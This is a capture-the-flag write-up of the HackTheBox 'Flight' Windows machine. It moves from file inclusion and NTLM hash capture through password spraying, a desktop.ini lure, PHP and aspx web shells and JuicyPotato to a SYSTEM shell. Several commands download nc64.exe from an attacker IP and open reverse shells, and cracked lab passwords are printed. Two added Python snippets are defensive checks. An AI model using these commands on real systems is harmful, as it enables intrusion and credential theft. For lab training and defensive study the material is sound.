HackTheBox — Flight

ARZ101
7 min read · May 6, 2023

Flight from HackTheBox involved forced NTLM authentication. Capturing and cracking svc_apache's hash, then password spraying the enumerated usernames, leads to S.Moon, who has write access to the Shared share. Uploading a desktop.ini there and performing forced authentication again gives us c.bum's hash. That user has access to the web directory through SMB, so uploading a PHP file gives command execution as svc_apache. Enumerating local ports shows port 8000 hosting the directory C:\inetpub\development; uploading an aspx file there runs commands in the context of iis apppool, a service account with the SeImpersonate privilege enabled, which can be abused through JuicyPotato to get a SYSTEM shell.

NMAP

Nmap scan report for 10.10.11.187    
Host is up (0.28s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-17 00:13:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 139/445 (SMB)

Checking null authentication on SMB shows that no share is accessible anonymously

PORT 80 (HTTP)

The site didn't have anything of interest, just a single page with no links, and gobuster didn't show anything interesting either

So we add flight.htb to the /etc/hosts file, since the domain name is shown at the bottom of the page

Fuzzing for subdomains using wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb"  --hh 7069

Adding this subdomain (school.flight.htb) to the hosts file and accessing the site

Checking for Local File Inclusion, the `view` parameter filters `..` if it appears in the URL but allows `/`

Foothold (Svc_apache)

Running wfuzz again to fuzz for LFI payloads, we find that we can just specify a file path without using `..`

Let’s verify whether we also have remote file inclusion; if so, we can point the include at a fake share on our machine and use Responder to capture an NTLMv2 hash

We have a hit, so now we run Responder and access a fake share with //IP/share

responder -I tun0
http://school.flight.htb/index.php?view=//10.10.14.28/uwu
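
Why a filter that only rejects `..` still lets `//10.10.14.28/uwu` through, shown as an added Python example that is not code from the write-up or from the box; the web root, file names and the allowlist resolver are constructed assumptions.

```python
"""Added example, not code from the original write-up or from the box: a ".."
blacklist next to an allowlist resolver for an include parameter. The web root,
file names and filter logic here are constructed assumptions."""
import tempfile
from pathlib import Path
from typing import Optional

# Constructed web root with one legitimate page for the demo.
WEBROOT = Path(tempfile.mkdtemp()) / "school"
(WEBROOT / "pages").mkdir(parents=True)
(WEBROOT / "pages" / "home.html").write_text("<h1>home</h1>")


def blacklist_filter(view: str) -> bool:
    """Mirrors the weak check seen above: only traversal sequences are rejected.
    Absolute paths and UNC paths (//host/share) contain no '..' and pass."""
    return ".." not in view


def is_absolute_or_unc(view: str) -> bool:
    """True for //host/share, \\\\host\\share, /etc/passwd and C:\\... forms."""
    v = view.replace("\\", "/")
    return v.startswith("/") or (len(v) > 1 and v[1] == ":")


def safe_resolve(view: str, root: Path = WEBROOT) -> Optional[Path]:
    """Allowlist approach: join under root/pages, canonicalise, and accept only
    if the result is still inside root and is an existing regular file."""
    if is_absolute_or_unc(view):
        return None
    candidate = (root / "pages" / view).resolve()
    try:
        candidate.relative_to(root.resolve())
    except ValueError:  # escaped the web root via traversal or a symlink
        return None
    return candidate if candidate.is_file() else None
```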

Saving this hash to a file and cracking it with john

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

With the valid credentials we can start enumerating the shares and usernames through crackmapexec

Using enum4linux-ng to query usernames and filtering the output so that we can password spray them

enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt

S.moon

Using either cme or kerbrute to perform a password spray, we find that S.Moon has the same password

kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'
cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

Checking shares with s.moon, we see that we have write access on `shared`

C.bum

Uploading a .scf file to perform forced authentication didn't work, as the share didn't allow us to upload that extension, not sure why

But uploading a desktop.ini file worked

[.ShellClassInfo]
IconResource=\\10.10.14.28\aa
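
A defender-side sweep for the desktop.ini / .scf lure above, written as an added example that is not part of the write-up: it flags icon paths that point at a UNC host outside an assumed allowlist. The share contents are constructed, and the trusted host g0.flight.htb (the DC name from the nmap output) is an assumption for the demo.

```python
"""Added example, not part of the original write-up: sweep a writable share for
desktop.ini / .scf files whose icon path points at a UNC host. Assumes UTF-8
files; real desktop.ini files are often UTF-16 and would need decoding first."""
import configparser
import re
import tempfile
from pathlib import Path

# Hosts allowed to serve icons over UNC; assumed, adjust per environment.
TRUSTED_HOSTS = {"g0.flight.htb"}
UNC_HOST = re.compile(r"^\\\\([^\\]+)\\")
ICON_KEYS = ("iconresource", "iconfile")


def icon_entries(path: Path):
    """Yield (key, value) for icon directives in an INI-style lure file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower
    cp.read_string(path.read_text(errors="ignore"))
    for section in cp.sections():
        for key, value in cp.items(section):
            if key in ICON_KEYS:
                yield key, value.strip()


def scan_share(root: Path):
    """Return [(relative file, key, host)] for icon paths that leave the share."""
    findings = []
    for f in sorted(root.rglob("*")):
        if f.name.lower() != "desktop.ini" and f.suffix.lower() != ".scf":
            continue
        for key, value in icon_entries(f):
            m = UNC_HOST.match(value.replace("/", "\\"))
            if m and m.group(1).lower() not in TRUSTED_HOSTS:
                findings.append((str(f.relative_to(root)), key, m.group(1)))
    return findings


def demo():
    """Constructed share: the write-up's lure, a benign local icon, and a UNC
    icon on the trusted host. Only the first should be reported."""
    share = Path(tempfile.mkdtemp())
    (share / "docs").mkdir()
    (share / "desktop.ini").write_text(
        "[.ShellClassInfo]\nIconResource=\\\\10.10.14.28\\aa\n")
    (share / "docs" / "desktop.ini").write_text(
        "[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n")
    (share / "docs" / "link.scf").write_text(
        "[Shell]\nCommand=2\nIconFile=\\\\g0.flight.htb\\icons\\x.ico\n")
    return scan_share(share)
```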

Cracking this hash again with john

Foothold

This user has write access on the web share, which means we can upload a PHP file that will be served on school.flight.htb

Uploading a php file calling phpinfo()

<?php phpinfo(); ?>

Having the ability to execute commands on the system through the uploaded PHP web shell (uwu.php), we can get a reverse shell by uploading nc.exe and executing it

http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe

http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe

Since we already have the credentials of c.bum, we can execute commands as that user using RunasCs.exe

.\RunasCs.exe c.bum Tikkycoll_431012284 whoami

Running netstat, we see that port 8000 is open locally

Port forwarding port 8000 using chisel

chisel server --reverse -p 8001

And running the client on the target machine

.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000

Accessing the port in our browser shows that access is denied

But the error page shows the path where the directory is hosted, C:\inetpub\Development

In this folder, there are a few html files

Running icacls on the development folder shows that c.bum has write access

Using RunasCs we can run a command as c.bum and download an aspx shell into that directory

.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'

Accessing the file through the browser

I tried executing nc.exe to get a reverse shell, but it wasn’t working for some reason, so instead I generated an msfvenom payload

Transfer it and execute it

On checking the privileges of iis apppool, SeImpersonate was enabled

To abuse this, we can use JuicyPotato-ng to get a system shell

.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"
